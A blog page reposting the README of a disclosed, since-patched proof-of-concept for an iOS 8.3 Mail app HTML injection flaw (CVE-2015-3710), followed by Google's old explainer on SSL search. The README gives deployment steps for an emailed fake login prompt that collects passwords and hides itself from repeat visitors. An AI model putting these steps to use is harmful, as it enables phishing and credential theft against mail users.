Security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization.

iOS Mail app

iOS’s Mail app

 

Demonstration of proof-of-concept attack on iOS’s Mail app. Apple was notified about technical details of this vulnerability on 2015-01-15

 

The source of this iOS’s Mail app exploit was posted here : https://github.com/jansoucek/iOS-Mail.app-inject-kit

 

iOS 8.3 Mail.app inject kit

Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Update 2015-06-30:

The exploit got a nice CVE-2015-3710 sticker and was fixed by Apple in iOS 8.4 and OS X 10.10.4. Kudos to Apple for prompt response once it was published publicly.

Usage

  • Edit the e-mail address you would like to use for password collection in framework.php
  • Upload index.php, framework.php and mydata.txt to your server
  • Send an e-mail containing HTML code from e-mail.html to the research subject
  • Don’t forget to change the modal-username GET parameter value to the e-mail address of the recipient
  • You can use https://putsmail.com for testing purposes

Credits

Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7/) – Framework7’s CSS code was used for the login dialog styling

License

MIT

Notes

The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified “collector” e-mail address and then returns the research subject back to Mail.app using redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password). Why even bother with this redirect nonsense when you can put <form> directly inside the HTML e-mail?

 

Share this post from Rbcafe :
Share on FacebookShare on Google+Share on LinkedInTweet about this on Twitter

Google SSL

Google SSL Search

With Google search over SSL, you can have an end-to-end encrypted search solution between your computer and Google. This secured channel helps protect your search terms and your search results pages from being intercepted by a third party. This provides you with a more secure and private search experience.

To use search over SSL, visit https://www.google.com each time you perform a search. Note that only Google web search is available over SSL, so other search products like Google Images and Google Maps are not currently available over SSL. When you’re searching over SSL, these properties may not appear in the left panel.

What is SSL ?

SSL (Secure Sockets Layer) is a protocol that helps provide secure Internet communications for services like web browsing, e-mail, instant messaging, and other data transfers. When you search over SSL, your search queries and search traffic are encrypted so they can’t be read by any intermediary party such as employers and internet service providers (ISPs).

What can I expect from search over SSL ?

Here’s how searching over SSL is different from regular Google search:

SSL encrypts the communication channel between Google and a searcher’s computer. When search traffic is encrypted, it can’t be read by third parties trying to access the connection between a searcher’s computer and Google’s servers. Note that the SSL protocol does have some limitations — more details are below.As another layer of privacy, SSL search turns off a browser’s referrers . Web browsers typically turn off referrers when going from HTTPS to HTTP mode to provide extra privacy. By clicking on a search result that takes you to an HTTP site, you could disable any customizations that the website provides based on the referrer information. At this time, search over SSL is supported only on Google web search. We will continue to work to support other products like Images and Maps. All features that are not supported have been removed from the left panel and the row of links at the top. You’ll continue to see integrated results like images and maps, and clicking those results will take you out of encrypted search mode. Your Google experience using SSL search might be slighly slower than you’re used to because your computer needs to first establish a secure connection with Google.

Note that SSL search does not reduce the data that Google receives and logs when you search, or change the listing of these terms in your Web History .

Does SSL provide complete security ?

While SSL helps prevent intermediary parties, such as ISPs, from knowing the exact search that you typed, they could still know which websites you visit once you click on the search results. For example, when you search over SSL for [ flowers ], Google encrypts the query “flowers” and the results that Google returns. But when you click on a search result, including results like images and maps, you could be exiting the encrypted mode if the destination link is not on https://.

If your computer is infected with malware or a keylogger, a third party might still be able to see the queries that you typed. We recommend that everyone learns how to prevent and remove malware.Remember that only Google web search supports search over SSL, so searching Google Images, for example, will not be encrypted.

Technical discussion of SSL protocol-level limitations. While SSL is a clear privacy and security benefit, we are aware of some technical limitations to SSL at the protocol level that are not specific to Google’s implementation:

A determined, skilled malicious party could potentially interpose himself into the network traffic and present a spoofed certificate to the user. In many cases, this will result in a certificate warning to the user. If you see a certificate warning, the protection may not hold. An adversary with the ability to install root certificates on the machine could potentially interpose himself into the network traffic without any warnings appearing. A highly capable source may be in a position to sign certificates with a standard, pre-installed certificate authority (CA), which again would allow intercept without any apparent warnings to the user. Even if all web searching occurs over SSL, a passive traffic listener may still be able to observe DNS look-ups.

How can I confirm whether I’m on a secure connection ?

Check to see that the URL you’re on starts with https:// instead of http://. Most browsers provide a visual confirmation (such as an icon of a lock) in the address bar or in the status bar at the bottom of the page. On Google SSL search, you’ll also see a special Google SSL logo with a lock icon. In addition to this logo, be sure to also check the https:// text in the address bar and any browser lock icons.

When you perform a search on https://www.google.com , you might see a warning if a page has some non-secure components: depending on your browser settings, you might see the lock icon turn into a warning sign, a pop-up message, or some other form of alert. This issue is often referred to as a “mixed mode error.”

Since this is a beta feature, there might be some rare cases in search over SSL that generate a mixed mode error. We’re working to prevent such errors, and you can help if you report any errors through our Help Forum.

EOF

Share this post from Rbcafe :
Share on FacebookShare on Google+Share on LinkedInTweet about this on Twitter
Rbcafe © 2004- | Rb Cafe 1.3 | Contacto Rbcafe | Rbcafe en Twitter | Rbcafe en Facebook | Política de privacidad